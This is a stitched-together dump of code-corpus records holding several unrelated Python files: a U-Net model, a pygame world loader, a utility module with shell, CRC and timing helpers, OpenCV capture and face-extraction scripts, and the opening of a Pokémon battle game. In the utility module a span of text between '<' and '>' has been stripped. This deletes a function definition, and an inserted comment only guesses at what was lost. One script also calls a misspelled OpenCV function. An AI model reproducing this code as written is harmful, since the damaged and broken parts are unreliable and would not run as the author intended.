self.up19 = nn.ConvTranspose2d(128, 64, 2, stride=2)\n self.conv19 = DoubleConv(128, 64)\n self.conv20 = nn.Conv2d(64,out_ch, 1)\n\n def forward(self, x):\n c1 = self.conv1(x)\n p1 = self.pool1(c1)\n c2 = self.conv2(p1)\n p2 = self.pool2(c2)\n c3 = self.conv3(p2)\n p3 = self.pool3(c3)\n c4 = self.conv4(p3)\n p4 = self.pool4(c4)\n c5 = self.conv5(p4)\n up_6 = self.up6(c5)\n # print('every_size',c5.shape,up_6.shape, c4.shape,p4.shape)\n merge6 = torch.cat([up_6, c4], dim=1)\n c6 = self.conv6(merge6)\n up_7 = self.up7(c6)\n merge7 = torch.cat([up_7, c3], dim=1)\n c7 = self.conv7(merge7)\n up_8 = self.up8(c7)\n merge8 = torch.cat([up_8, c2], dim=1)\n c8 = self.conv8(merge8)\n up_9 = self.up9(c8)\n merge9 = torch.cat([up_9, c1], dim=1)\n c9 = self.conv9(merge9)\n c10 = self.conv10(c9)\n # out = nn.Sigmoid()(c10)\n\n 
c11 = self.conv11(c10)\n p11 = self.pool11(c11)\n c12 = self.conv12(p11)\n p12 = self.pool12(c12)\n c13 = self.conv13(p12)\n p13 = self.pool13(c13)\n c14 = self.conv14(p13)\n p14 = self.pool14(c14)\n c15 = self.conv15(p14)\n up_16 = self.up16(c15)\n # print('every_size',c15.shape,up_16.shape, c14.shape,p14.shape)\n merge16 = torch.cat([up_16, c14], dim=1)\n c16 = self.conv16(merge16)\n up_17 = self.up17(c16)\n merge17 = torch.cat([up_17, c13], dim=1)\n c17 = self.conv17(merge17)\n up_18 = self.up18(c17)\n merge18 = torch.cat([up_18, c12], dim=1)\n c18 = self.conv18(merge18)\n up_19 = self.up19(c18)\n merge19 = torch.cat([up_19, c11], dim=1)\n c19 = self.conv19(merge19)\n c20 = self.conv20(c19)\n\n res=c20.permute(0, 2, 3, 1)\n res=res.contiguous().view(-1, 2)\n out = torch.softmax(res,dim=1)\n\n return out\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"unet_cascade.py","file_name":"unet_cascade.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"271999596","text":"import pygame as pg\nimport unit\nimport chunk as ch\nimport sys\nimport camera\nimport math\nimport threading\nimport worldgen\n\nimport CONSTS\n\nclass World():\n\n def __init__(self, size):\n pg.init()\n self.ssize = size\n self.screen = pg.display.set_mode((size[0], size[1]))\n pg.display.set_caption(\"It goes on.\")\n self.clock = pg.time.Clock()\n\n self.world_generator = worldgen.WorldGenerator()\n self.loaded = []\n self.player = unit.Player((0,0))\n self.heroes = [self.player]\n self.camera = camera.Camera((int(-size[0]/2),int(-size[0]/2)))\n\n self.chunker_ready = False\n\n\n def display(self):\n for chunk in self.loaded:\n worldPos = chunk.pos[0]*CONSTS.SIZE, chunk.pos[1]*CONSTS.SIZE\n try:\n self.screen.blit(chunk.surface, self.camera.apply(worldPos))\n except AttributeError:\n print(\"chunk.surface does not exist, maybe generating\")\n\n pg.display.flip()\n\n def update(self):\n self.clock.tick(60)\n\n def chunker(self, heroes, maximum):\n for hero in heroes:\n for chunk in self.loaded:\n distance = max(abs(hero.wpos[0] - chunk.pos[0]), abs(hero.wpos[1] - chunk.pos[1]))\n\n if distance > maximum:\n self.unload(chunk)\n\n for i in range(-maximum, maximum + 1):\n for j in range(-maximum, maximum + 1):\n self.load((hero.wpos[0] + i, hero.wpos[1] + j))\n\n def load(self, pos):\n for chunk in self.loaded:\n if chunk.pos == pos:\n return None\n else:\n self.loaded.append(ch.Chunk(CONSTS.SIZE, pos, self.world_generator))\n\n def unload(self, chunk):\n self.loaded.remove(chunk)\n\n def playerUpdate(self, left, right, up, down):\n if left:\n self.player.update((self.player.pos[0] - 1, self.player.pos[1]))\n if right:\n self.player.update((self.player.pos[0] + 1, self.player.pos[1]))\n if up:\n self.player.update((self.player.pos[0], self.player.pos[1] - 1))\n if down:\n self.player.update((self.player.pos[0], self.player.pos[1] + 1))\n\n def cameraUpdate(self, target):\n self.camera.update((target.pos[0] + int(-self.ssize[0]/2 + CONSTS.SIZE/2), target.pos[1] + int(-self.ssize[0]/2 + CONSTS.SIZE/2)))\n\n def run(self):\n self.running = True\n left, right, up, down = False, False, False, False\n\n threading.Thread(target=self.chunkerThread).start()\n while self.running:\n for event in pg.event.get():\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_LEFT:\n left = True\n if event.key == pg.K_RIGHT:\n right = True\n if event.key == pg.K_UP:\n up = True\n if event.key == pg.K_DOWN:\n down = True\n\n if event.type == pg.KEYUP:\n if 
event.key == pg.K_LEFT:\n left = False\n if event.key == pg.K_RIGHT:\n right = False\n if event.key == pg.K_UP:\n up = False\n if event.key == pg.K_DOWN:\n down = False\n if event.type == pg.QUIT:\n self.running = False\n sys.exit(0)\n\n self.screen.fill((0,0,0))\n\n self.chunker_ready = True\n self.playerUpdate(left, right, up, down)\n self.cameraUpdate(self.player)\n self.display()\n self.update()\n\n def chunkerThread(self):\n while self.running:\n if self.chunker_ready:\n self.chunker(self.heroes, CONSTS.MAXIMUM_RANGE)\n self.chunker_ready = False\n else:\n pass\n","sub_path":"infinite_world/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373105589","text":"# -*- coding: utf-8 -*-\n\n\"\"\"common APIs\nby Kobe Gong 2017-8-21\nuse:\n all the funcs can be used by any module should be here\n\"\"\"\n\nimport binascii\nimport functools\nimport hashlib\nimport os\nimport re\nimport socket\nimport struct\nimport sys\nfrom binascii import unhexlify\nfrom subprocess import *\nimport time\n\nimport crcmod.predefined\n\n'''\ndef file_lock(open_file):\n return fcntl.flock(open_file, fcntl.LOCK_EX | fcntl.LOCK_NB)\n\ndef file_unlock(open_file):\n return fcntl.flock(open_file, fcntl.LOCK_UN)\n'''\n\n\ndef get_output(*popenargs, **kwargs):\n process = Popen(*popenargs, stdout=PIPE, **kwargs)\n output, unused_err = process.communicate()\n retcode = process.poll()\n return output\n\n\ndef full_output(*popenargs, **kwargs):\n process = Popen(*popenargs, **kwargs)\n output, unused_err = process.communicate()\n retcode = process.poll()\n return output\n\n\n# run a cmd and check exec result\ndef my_system(*cmd):\n return check_output(*cmd, universal_newlines=True, shell=True)\n\n\n# run a cmd without check exec result\ndef my_system_no_check(*cmd):\n print('run:' + cmd[0])\n return get_output(*cmd, universal_newlines=True, shell=True)\n\n\n# run a cmd without check exec result\ndef my_system_full_output(*cmd):\n print('run:' + cmd[0])\n return full_output(*cmd, universal_newlines=True, shell=True)\n\n\ndef register_caseid(casename):\n def cls_decorator(cls):\n def __init__(self, config_file='C:\\\\ATS\\\\config.ini', case_id='xxxxxxxx'):\n super(cls, self).__init__(case_id=casename.split('_')[1])\n\n cls.__init__ = __init__\n return cls\n\n return cls_decorator\n\n\n# get all the files match regex 'file_re' from a dir\ndef get_file_by_re(dir, file_re):\n file_list = []\n if os.path.exists(dir):\n pass\n else:\n print(dir + ' not exist!\\n')\n return file_list\n\n all_things = os.listdir(dir)\n\n for item in all_things:\n if os.path.isfile(os.path.join(dir, os.path.basename(item))) and re.match(file_re, item, re.S):\n file_list.append(os.path.join(dir, os.path.basename(item)))\n\n elif os.path.isdir(os.path.join(dir, os.path.basename(item))):\n file_list += get_file_by_re(os.path.join(dir,\n os.path.basename(item)), file_re)\n\n else:\n continue\n\n return file_list\n\n\n# use to copy a dir to another dir\ndef dir_copy(source_dir, target_dir):\n for f in os.listdir(source_dir):\n sourceF = os.path.join(source_dir, f)\n targetF = os.path.join(target_dir, f)\n\n if os.path.isfile(sourceF):\n # 创建目录\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n\n # 文件不存在,或者存在但是大小不同,覆盖\n if not os.path.exists(targetF) or (\n os.path.exists(targetF) and (os.path.getsize(targetF) != os.path.getsize(sourceF))):\n # 2进制文件\n open(targetF, \"wb\").write(open(sourceF, \"rb\").read())\n 
else:\n                pass\n\n        elif os.path.isdir(sourceF):\n            dir_copy(sourceF, targetF)\n\n\n# use to make a dir standard\ndef dirit(dir):\n    if not dir.endswith(os.path.sep):\n        dir += os.path.sep\n\n    return re.sub(r'%s+' % (re.escape(os.path.sep)), re.escape(os.path.sep), dir, flags=re.S)\n\n\n# use to add a lock before calling the func\ndef need_add_lock(lock):\n    def sync_with_lock(func):\n        @functools.wraps(func)\n        def new_func(*args, **kwargs):\n            lock.acquire()\n            try:\n                return func(*args, **kwargs)\n            finally:\n                lock.release()\n\n        return new_func\n\n    return sync_with_lock\n\n\n# Hex print\ndef protocol_data_printB(data, title=''):\n    if isinstance(data, type(b'')):\n        pass\n    else:\n        data = data.encode('utf-8')\n    ret = title + ' %s bytes:' % (len(data)) + '\\n\\t\\t'\n    counter = 0\n    for item in data:\n        if isinstance('', type(b'')):\n            ret += '{:02x}'.format(ord(item)) + ' '\n        else:\n            ret += '{:02x}'.format(item) + ' '\n        counter += 1\n        if counter == 10:\n            ret += ' ' + '\\n\\t\\t'\n            counter -= 10\n\n    return ret\n\n\n# create CRC\ndef crc(s):\n    result = 0\n    for i in range(len(s)):\n        result += struct.unpack('B', s[i])[0]\n\n    result %= 0xff\n    return struct.pack('B', result)\n\n\n# create CRC16\ndef crc16(data, reverse=False):\n    if isinstance(data, type(b'')):\n        pass\n    else:\n        data = data.encode('utf-8')\n    a = binascii.b2a_hex(data)\n    s = unhexlify(a)\n    crc16 = crcmod.predefined.Crc('crc-ccitt-false')\n    crc16.update(s)\n    if reverse == False:\n        return struct.pack('>H', crc16.crcValue)\n    else:\n        return struct.pack('<H', crc16.crcValue)\n\n\n# NOTE: this helper's def line was lost to extraction garbling (the span between\n# '<' and the next '>' was stripped), so the name and parameter are assumptions;\n# the surviving body returns the numerically largest string in a list.\ndef get_max_str(str_list):\n    max_str = '0'\n    for item in str_list:\n        if int(item) > int(max_str):\n            max_str = item\n    return max_str\n\n\ndef chinese_show(data):\n    coding = sys.getfilesystemencoding()\n    if isinstance('', type(u'')):\n        tmp_data = data\n    else:\n        tmp_data = data.decode('utf-8').encode(coding)\n\n    return tmp_data\n\n\ndef get_local_ipv4():\n    addrs = socket.getaddrinfo(socket.gethostname(), None)\n    return [item[4][0] for item in addrs if ':' not in item[4][0]]\n\n\ndef bit_set(byte, bit):\n    temp = struct.unpack('B', byte)[0]\n    temp = temp | (1 << bit)\n    return struct.pack('B', temp)\n\n\ndef bit_get(byte, bit):\n    temp = struct.unpack('B', byte)[0]\n    return (temp & (1 << bit))\n\n\ndef bit_clear(byte, bit):\n    temp = struct.unpack('B', byte)[0]\n    temp = temp & ~(1 << bit)\n    return struct.pack('B', temp)\n\n\nclass msgs_info:\n    def __init__(self, name, msg, num):\n        self.name = name\n        self.msg = msg\n        self.num = num\n\n\nclass msgst_time_info:\n    def __init__(self):\n        self.now = lambda: time.time()\n        # timestamp of the packet currently awaiting a reply\n        self.start: float = 0\n        # accumulated total delay\n        self.total_delay_s = 0\n        # number of packets counted toward the average delay\n        self.delay_pkt_count: int = 0\n        # times the send timestamp had to be reset (previous packet never answered)\n        self.reset_count = 0\n        # times a packet was received while the send timestamp was still 0\n        self.ignore_send_count = 0\n        # decimal places kept for the average delay\n        self.digit_num = 4\n\n    def send_update(self):\n        # a nonzero send timestamp means the previous packet was never answered; count a reset before overwriting it\n        if self.start != 0:\n            self.reset_count += 1\n        self.start = self.now()\n\n    def recv_update(self):\n        # no send timestamp means this command arrived first; the simulator only needs to reply and no delay is computed, so count it as ignored\n        if self.start == 0:\n            self.ignore_send_count += 1\n        else:\n            self.total_delay_s = self.total_delay_s + self.now() - self.start\n            self.start = 0\n            self.delay_pkt_count += 1\n\n    def get_avg_delay_s(self):\n        if self.delay_pkt_count == 0:\n            return 0\n        return round(self.total_delay_s / self.delay_pkt_count, self.digit_num)\n\n    def __add__(self, other):\n        if isinstance(other, msgst_time_info):\n            new_obj = msgst_time_info()\n            new_obj.delay_pkt_count = self.delay_pkt_count + other.delay_pkt_count\n            new_obj.total_delay_s = self.total_delay_s + other.total_delay_s\n            new_obj.reset_count = self.reset_count + other.reset_count\n            new_obj.ignore_send_count = self.ignore_send_count + other.ignore_send_count\n            return new_obj\n        else:\n            raise NotImplementedError(\"Not support type {}\".format(type(other)))\n\n    def __str__(self):\n        tmp_str = \"total_delay_s:{} avg_count:{} avg_delay_s:{}\".format(self.total_delay_s, self.delay_pkt_count,\n                                                                       self.get_avg_delay_s())\n        if self.reset_count != 0:\n            tmp_str += \" reset_count:{}\".format(self.reset_count)\n        if self.ignore_send_count != 0:\n            tmp_str += \" ignore_send_count:{}\".format(self.ignore_send_count)\n        return tmp_str\n\n    def reset(self):\n        self.now = lambda: time.time()\n        # timestamp of the packet currently awaiting a reply\n        self.start: float = 0\n        # accumulated total delay\n        self.total_delay_s = 0\n        # number of packets counted toward the average delay\n        self.delay_pkt_count: int = 0\n        # times the send timestamp had to be reset (previous packet never answered)\n        self.reset_count = 0\n        # times a packet was received while the send timestamp was still 0\n        self.ignore_send_count = 0\n        # decimal places kept for the average delay\n        self.digit_num = 4\n\n\nif __name__ == '__main__':\n    t1 = msgst_time_info()\n    t1.delay_pkt_count = 3\n    t1.avg_delay_s = 2\n    print(\"t1=\", t1)\n    t2 = msgst_time_info()\n    t2 += t1\n    print(\"t2=\", t2)\n    t2 += t1\n    print(\"t2=\", t2)\n    exit(666)\n    print(crc16(b'12345678'))\n    print(crc16(b'1234567890'))\n","sub_path":"smartDev/APIs/common_APIs.py","file_name":"common_APIs.py","file_ext":"py","file_size_in_byte":9023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"275684882","text":"from ranker import topic_z_scorer\nfrom para_terms import searcher \nfrom sklearn.feature_extraction.text import TfidfVectorizer as tfidf\n\ndef combine_z(z_1,z_2):\n\t# print(\"to combine_z\")\n\tif not z_2:\n\t\treturn z_1\n\t# print('combining')\n\tfor key in z_2.keys():\n\t\t# print(key)\n\t\tif key in z_1.keys():\n\t\t\tz_1[key]+=z_2[key]\n\t\telse:\n\t\t\tz_1[key]=z_2[key]\n\treturn z_1\n\ndef search(query):\n\tkey_terms=searcher(query)\n\ttermlist=[]\n\tprint(key_terms)\n\tif not key_terms:\n\t\t# print(\"here\")\n\t\tkey_terms=tfidf().build_tokenizer()(query)\n\t# print(key_terms)\n\tranked={}\n\tfor term in key_terms:\n\t\tif term not in termlist:\n\t\t\tranks,authrs=topic_z_scorer(term)\n\t\t\tif not ranked:\n\t\t\t\tranked=authrs\n\t\t\telse:\n\t\t\t\tranked=combine_z(ranked,authrs)\n\t\t\ttermlist.append(term)\n\t\t# print(ranked,authrs)\n\tfor term in key_terms:\n\t\tsub_terms=tfidf().build_tokenizer()(query)\n\t\tfor sub_term in sub_terms:\n\t\t\tif sub_term not in termlist:\n\t\t\t\tranks,authrs=topic_z_scorer(sub_term)\n\t\t\t\tauthrs={auth:authrs[auth]*0.75 for auth in authrs}\n\t\t\t\tif not ranked:\n\t\t\t\t\tranked=authrs\n\t\t\t\telse:\n\t\t\t\t\tranked=combine_z(ranked,authrs)\n\t\t\t\ttermlist.append(sub_term)\n\n\tfor term in tfidf().build_tokenizer()(query):\n\t\tfor word in tfidf().build_tokenizer()(term):\n\t\t\tif word not in termlist:\n\t\t\t\tranks,authrs=topic_z_scorer(word)\n\t\t\t\tauthrs={auth:authrs[auth]*1.25 for auth in authrs}\n\t\t\t\tif not ranked:\n\t\t\t\t\tranked=authrs\n\t\t\t\telse:\n\t\t\t\t\tranked=combine_z(ranked,authrs)\n\t\t\t\ttermlist.append(word)\n\n\tranks_final=sorted([(ranked[key],key) for key in ranked.keys()])\n\tranks_final.reverse()\n\tprint(ranks_final)\n\treturn [name[1] for name in ranks_final]\n\nif __name__ == '__main__':\n\timport sys\n\t# print(sys.argv[1])\n\tif len(sys.argv) > 1:\n\t\tfor name in search(sys.argv[1])[:10]:\n\t\t\tprint(name)\n\telse:\n\t\tfor name in search(\"Coronary Heart Disease\")[:10]:\n\t\t\tprint(name)\n\n","sub_path":"search_long.py","file_name":"search_long.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
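A quick sanity check for the crc16 helper in the common_APIs.py record above: CRC-16/CCITT-FALSE has the published check value 0x29B1 for the ASCII input "123456789", so crcmod's predefined table can be exercised directly. The snippet below is an illustrative sketch, not part of any record; it assumes nothing beyond crcmod being installed.

import struct

import crcmod.predefined

# Same predefined algorithm the helper instantiates via Crc('crc-ccitt-false').
crc_func = crcmod.predefined.mkCrcFun('crc-ccitt-false')

value = crc_func(b'123456789')
assert value == 0x29B1  # published check value for CRC-16/CCITT-FALSE

# Big-endian packing, matching the helper's default (reverse=False) branch.
print(struct.pack('>H', value).hex())  # prints '29b1'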
+{"seq_id":"7426928","text":"from numpy import *\nfrom gfpersist import *\n\ndef load_recarray(filepath, select, headers, filter=None):\n records = []\n pc = PersistanceContainer(filepath)\n for p in pc.read_all():\n if (not filter) or filter(p):\n records.append(select(p))\n \n if not records:\n return None\n else:\n return rec.fromrecords(records, names=headers)\n\n\n","sub_path":"py-core/goodfather/gfnumpy.py","file_name":"gfnumpy.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"119307654","text":"# ESZA019−17 − Visao Computacional − NA − 2Q2019\r\n# PRATICA 01\r\n#\r\n# RA: 11039113\r\n# NOME: Matheus E. S. Araújo\r\n#\r\n# E−MAIL: matheus.esa17@gmail.com\r\n# Git-Hub: https://github.com/MatheusESAraujo/Visao_computacional\r\n#\r\n# DESCRICAO:\r\n# − Neste código é realizada a captura de imagens, após isso as imagens são salvas no formato jpg e bmp e transformadas em escala de cinza;\r\n# - Para a transformação em escala de cinza é utilizada a função: cv.cvtColor(frame,cv.COLOR_BGR2GRAY);\r\n# - Além disso a imagem também é transformada utilizando os parametros alfa,beta e gama definidos;\r\n# - Para aplicar a ponderação é utilizada a função: cv.split(frame) - ela separa a imagem em cada cor para depois aplicar a soma ponderada\r\n\r\nimport numpy as np\r\nimport cv2 as cv\r\n\r\ncap = cv.VideoCapture(0)\r\n\r\nfourcc = cv.VideoWriter_fourcc(*'XVID')\r\n\r\nalfa=0.2989 #Parametro para ponderação do canal vermelho na escala de cinza\r\nbeta=0.5870 #Parametro para ponderação do canal verde na escala de cinza\r\ngama=0.1140 #Parametro para ponderação do canal Azul na escala de cinza\r\n\r\n\r\nwhile(cap.isOpened()):\r\n ret,frame = cap.read()\r\n if ret == True:\r\n # out.write(frame)\r\n\r\n cv.imshow('frame',frame)\r\n cv.imwrite(\"Imagens_e_videos/Photo12.JPG\",frame)\r\n cv.imwrite(\"Imagens_e_videos/Photo12.bmp\",frame)\r\n gray = cv.cvtColor(frame,cv.COLOR_BGR2GRAY)\r\n cv.imwrite(\"Imagens_e_videos/Photo12__gray_funcao.JPG\",gray)\r\n cv.imwrite(\"Imagens_e_videos/Photo12__gray_funcao.bmp\",gray)\r\n (canalAzul, canalVerde, canalVermelho) = cv.split(frame) #Separa a imagem em cada canal de cor\r\n cv.imwrite(\"Imagens_e_videos/Photo12_gray_pond.jpg\", (alfa*canalVermelho+beta*canalVerde+gama*canalAzul)) #Aplica o peso de alfa,beta e gama sobre cada canal\r\n cv.imwrite(\"Imagens_e_videos/Photo12_gray_pond.bmp\", (alfa*canalVermelho+beta*canalVerde+gama*canalAzul)) #Aplica o peso de alfa,beta e gama sobre cada canal\r\n\r\n if cv.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n else:\r\n break\r\n\r\ncap.release()\r\n# out.release()\r\ncv.DestroyAllWindows()\r\n\r\n\r\n\r\n","sub_path":"Lab01/Atv_a1_p2.py","file_name":"Atv_a1_p2.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475881479","text":"import random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\npath = os.getcwd()\n\ndef bernouli(p, k):\n return p if k else (1-p)\n\nif __name__ == '__main__':\n n_experiment = 100\n p = 0.6\n x = np.arange(n_experiment)\n y = []\n for _ in range(n_experiment):\n pick = bernouli(p, k=bool(random.getrandbits(1)))\n y.append(pick)\n\n u, s = np.mean(y), np.std(y)\n plt.scatter(x, y, label=r'$\\mu=%.2f,\\ \\sigma=%.2f$' % (u, s))\n plt.legend()\n plt.savefig(path + '/bernouli.png')\n 
plt.show()","sub_path":"bernoulli.py","file_name":"bernoulli.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273196027","text":"# USAGE\n# python extract.py --output outputDir/ --input someDir/\n# python extract.py --output outputDir/ --input image.png\n# python extract.py --output outputDir/ --input video.mp4\n\nimport os\nimport cv2\nimport argparse\nimport filetype\nimport cvlib as cv\n\ndef main(args):\n input = args[\"input\"]\n isDirectory = os.path.isdir(input)\n sources = []\n if isDirectory:\n files = []\n for path in os.listdir(input):\n file = os.path.join(input, path)\n if os.path.isfile(file):\n files.append(file)\n sources.extend(files)\n else:\n sources.append(input)\n\n images = []\n for path in sources:\n kind = filetype.guess(path)\n if kind is None:\n continue\n if kind.mime.startswith('video'):\n print('[INFO] extracting frames from video...')\n video = cv2.VideoCapture(path)\n while True:\n success, frame = video.read()\n if success:\n image = {\n \"file\": frame,\n \"source\": path,\n \"sourceType\": \"video\",\n \"filename\": os.path.splitext(os.path.basename(path))[0]\n }\n images.append(image)\n else:\n break\n video.release()\n cv2.destroyAllWindows()\n elif kind.mime.startswith('image'):\n image = {\n \"file\": cv2.imread(path),\n \"source\": path,\n \"sourceType\": \"image\",\n \"filename\": os.path.splitext(os.path.basename(path))[0]\n }\n images.append(image)\n\n cwd = os.getcwd()\n outputDir = os.path.join(cwd, args[\"output\"])\n if not os.path.exists(outputDir):\n os.makedirs(outputDir)\n\n total = 0\n for (i, image) in enumerate(images):\n print(\"[INFO] processing image {}/{}\".format(i + 1, len(images)))\n\n results, confidences = cv.detect_face(image[\"file\"]) \n \n for (j, bounds) in enumerate(results):\n (startX, startY, endX, endY) = bounds\n face = image[\"file\"][startY:endY, startX:endX]\n (fH, fW) = face.shape[:2]\n \n if fW < 10 or fH < 10:\n continue\n\n outputFilename = ''\n if image[\"sourceType\"] == \"video\":\n outputFilename = '{}_{:04d}_{}.jpg'.format(image[\"filename\"], i, j)\n else:\n outputFilename = '{}_{}.jpg'.format(image[\"filename\"], j)\n outputPath = os.path.join(outputDir, outputFilename)\n cv2.imwrite(outputPath, face)\n total += 1\n\n print(\"[INFO] found {} face(s)\".format(total))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n \n # options\n parser.add_argument(\"-i\", \"--input\", required=True, help=\"path to input directory or file\")\n parser.add_argument(\"-o\", \"--output\", default=\"output\", help=\"path to output directory of faces\")\n \n args = vars(parser.parse_args())\n main(args)","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"68522605","text":"import pygame\r\nfrom pygame.sprite import Group\r\nfrom pokemons import Pokemon\r\nfrom settings import Setting\r\nfrom menubar import Menubar\r\nfrom pointer import Pointer, SelectionPointer\r\nfrom skills import Knock, ShadowBall, Powerup, Lightning, FireBeam, Kirin, Tsunami, Hypnotism, Protection, FireKick, DragonClaw, SabreDance, BulletFist, Yeokrin, Waterfall, IceBeam, Splash\r\nfrom statebar import Statebar, Statebar01, Healthbar\r\nfrom skillmenu import Skillbar\r\nimport game_functions as gf\r\nimport random\r\nimport sys\r\nimport os\r\n\r\n\r\n# import socket\r\n\r\n\r\ndef main():\r\n 
'''\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n print(s.recv(1024).decode(encoding='utf8'))\r\n state = int(s.recv(1024).decode())\r\n s.close()\r\n '''\r\n pygame.init()\r\n state = 0\r\n # 创建 设置 实例\r\n p_setting = Setting()\r\n\r\n # 创建屏幕\r\n screen = pygame.display.set_mode(\r\n (p_setting.screen_width, p_setting.screen_height))\r\n # 绘制背景图像\r\n screen.blit(p_setting.screen_bg, (0, 0))\r\n # 创建菜单栏 对象\r\n menubar = Menubar(p_setting, screen)\r\n\r\n '''\r\n 创建技能\r\n '''\r\n clock = pygame.time.Clock()\r\n # 创建 撞击技能 对象(我方)\r\n knock01 = Knock(p_setting, screen, menubar)\r\n\r\n # 创建 撞击技能 对象(敌方)\r\n knock02 = Knock(p_setting, screen, menubar)\r\n\r\n # 创建 水溅跃技能 对象(敌方)\r\n splash02 = Splash(p_setting, screen, menubar)\r\n\r\n # 创建 影子球技能 对象(我方)\r\n shadowBall01 = ShadowBall(p_setting, screen, menubar)\r\n\r\n # 创建 影子球技能 对象(敌方)\r\n shadowBall02 = ShadowBall(p_setting, screen, menubar)\r\n\r\n # 创建 力量提升技能 对象(我方)\r\n powerup01 = Powerup(p_setting, screen, menubar)\r\n\r\n # 创建 力量提升技能 对象(敌方)\r\n powerup02 = Powerup(p_setting, screen, menubar)\r\n\r\n # 创建 雷击技能 对象(我方)\r\n lightning01 = Lightning(p_setting, screen, menubar)\r\n\r\n # 创建 雷击技能 对象(敌方)\r\n lightning02 = Lightning(p_setting, screen, menubar)\r\n\r\n # 创建 大字爆技能 对象(我方)\r\n fireBeam01 = FireBeam(p_setting, screen, menubar)\r\n\r\n # 创建 大字爆技能 对象(敌方)\r\n fireBeam02 = FireBeam(p_setting, screen, menubar)\r\n\r\n # 创建 麒麟技能 对象(我方)\r\n kirin01 = Kirin(p_setting, screen, menubar)\r\n\r\n # 创建 麒麟技能 对象(敌方)\r\n kirin02 = Kirin(p_setting, screen, menubar)\r\n\r\n # 创建 海啸技能 对象(我方)\r\n tsunami01 = Tsunami(p_setting, screen, menubar)\r\n\r\n # 创建 海啸技能 对象(敌方)\r\n tsunami02 = Tsunami(p_setting, screen, menubar)\r\n\r\n # 创建 催眠术技能 对象(我方)\r\n hypnotism01 = Hypnotism(p_setting, screen, menubar)\r\n\r\n # 创建 保护技能 对象(我方)\r\n protection01 = Protection(p_setting, screen, menubar)\r\n\r\n # 创建 保护技能 对象(敌方)\r\n protection02 = Protection(p_setting, screen, menubar)\r\n\r\n # 创建 火焰踢技能 对象(我方)\r\n fireKick01 = FireKick(p_setting, screen, menubar)\r\n\r\n # 创建 火焰踢技能 对象(敌方)\r\n fireKick02 = FireKick(p_setting, screen, menubar)\r\n\r\n # 创建 龙之爪技能 对象(我方)\r\n dragonClaw01 = DragonClaw(p_setting, screen, menubar)\r\n\r\n # 创建 龙之爪技能 对象(敌方)\r\n dragonClaw02 = DragonClaw(p_setting, screen, menubar)\r\n\r\n # 创建 剑舞技能 对象(我方)\r\n sabreDance01 = SabreDance(p_setting, screen, menubar)\r\n\r\n # 创建 剑舞技能 对象(敌方)\r\n sabreDance02 = SabreDance(p_setting, screen, menubar)\r\n\r\n # 创建 子弹拳技能 对象(我方)\r\n bulletFist01 = BulletFist(p_setting, screen, menubar)\r\n\r\n # 创建 子弹拳技能 对象(敌方)\r\n bulletFist02 = BulletFist(p_setting, screen, menubar)\r\n\r\n # 创建 逆鳞技能 对象(我方)\r\n yeokrin01 = Yeokrin(p_setting, screen, menubar)\r\n\r\n # 创建 逆鳞技能 对象(敌方)\r\n yeokrin02 = Yeokrin(p_setting, screen, menubar)\r\n\r\n # 创建 攀瀑技能 对象(我方)\r\n waterfall01 = Waterfall(p_setting, screen, menubar)\r\n\r\n # 创建 攀瀑技能 对象(敌方)\r\n waterfall02 = Waterfall(p_setting, screen, menubar)\r\n\r\n # 创建 急冻光束技能 对象(我方)\r\n iceBeam01 = IceBeam(p_setting, screen, menubar)\r\n\r\n # 创建 急冻光束技能 对象(敌方)\r\n iceBeam02 = IceBeam(p_setting, screen, menubar)\r\n\r\n # skills01=\r\n '''\r\n 蛇纹熊初始化 0\r\n '''\r\n # 创建 我方蛇纹熊\r\n Zigzagoon01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Zigzagoon01.png\", \"../othersource/Pic/headPortraits/Zigzagoon01.png\",\r\n 1, '蛇纹熊', 50, 100, 20, 20, 50, 0, 20, 70, 118)\r\n Zigzagoon01.orderPos = (50, 110)\r\n\r\n # 创建 野生蛇纹熊\r\n Zigzagoon02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Zigzagoon02.png\", None, 2, '蛇纹熊',\r\n 100, 100, 20, 20, 50, 0, 
